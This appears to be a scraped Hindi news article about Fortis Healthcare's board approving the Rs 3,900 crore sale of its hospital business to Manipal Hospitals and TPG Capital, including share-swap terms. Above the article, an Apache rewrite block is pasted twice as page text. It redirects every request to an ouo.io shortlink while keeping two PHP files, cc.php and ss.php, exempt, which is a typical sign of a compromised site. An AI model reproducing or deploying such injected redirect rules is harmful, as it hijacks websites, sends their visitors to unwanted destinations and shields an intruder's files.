
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 366
नई दिल्ली। फोर्टिस हेल्थकेयर लिमिटेड (एफ.एच.एल.) के निदेशक मंडल ने अपने अस्पताल कारोबार को अलग करने की मंजूरी दे दी है। इस कारोबार का अधिग्रहण मणिपाल हॉस्पिटल्स और टीपीजी कैपिटल करेगी। यह पूरा सौदा 3,900 करोड़ रुपए का होगा। फोर्टिस अस्पताल के मैनेज्मेंट ने इस बात की जानकारी दी थी।
कंपनी ने बयान में कहा, "निदेशक मंडल ने एस.आर.एल. लिमिटेड में अपनी 20 प्रतिशत हिस्सेदारी को मणिपाल को बेचने की भी मंजूरी दी है। इसकी वजह से मणिपाल हॉस्पिटल्स एन.एस.ई. और बी.एस.ई. पर सूचीबद्ध कंपनी बन जाएगी। एफ.एच.एल. के पास एस.आर.एल. में बाकी बची 36.6 प्रतिशत हिस्सेदारी रहेगी। डा. रंजन पई और अमेरिका की निजी इक्विटी फर्म टीपीजी कैपिटल मणिपाल हॉस्पिटल्स (एस.आर.एल.) में 3,900 करोड़ रुपए का निवेश करेंगे ताकि एस.आर.एल. में 50.9 प्रतिशत हिस्से के अधिग्रहण को फाइनेंस किया जा सके। एफ.एच.एल. ने कहा कि मणिपाल और फोर्टिस हॉस्पिटल्स के संयोजन से यह राजस्व के लिहाज से देश का सबसे बड़ा स्वास्थ्य प्रदाता बन जाएगा। संयुक्त कंपनी के निर्माण के बाद देशभर में इस हॉस्पिटल्स के 4200 डॉक्टर, 9300 नर्स और 11,400 अन्य कर्मचारी हो जाएंगे।
सौदे के हिस्से के रूप में शेयरधारकों को फोर्टिस के हर 100 शेयर पर मणिपाल हॉस्पिटल्स के 10.83 शेयर मिलेंगे। फोर्टिस के प्रवर्तक मालविंदर सिंह और शिविंदर मोहन सिंह ने संयुक्त बयान में कहा कि यह लेन-देन सभी शेयरधारकों के लिए महत्वपूर्ण मूल्य को खोल देंगे और भारत में उच्च गुणवत्ता वाली स्वास्थ्य सेवाएं प्रदान करने में मदद करेगा। उन्होंने कहा, "कंपनी और उससे ज्यादा शेयरधारकों के हितों का ध्यान रखते हुए हम नई संयुक्त इकाई के गठन में प्रबंधन और निदेशक को सहयोग करना जारी रखेंगे।"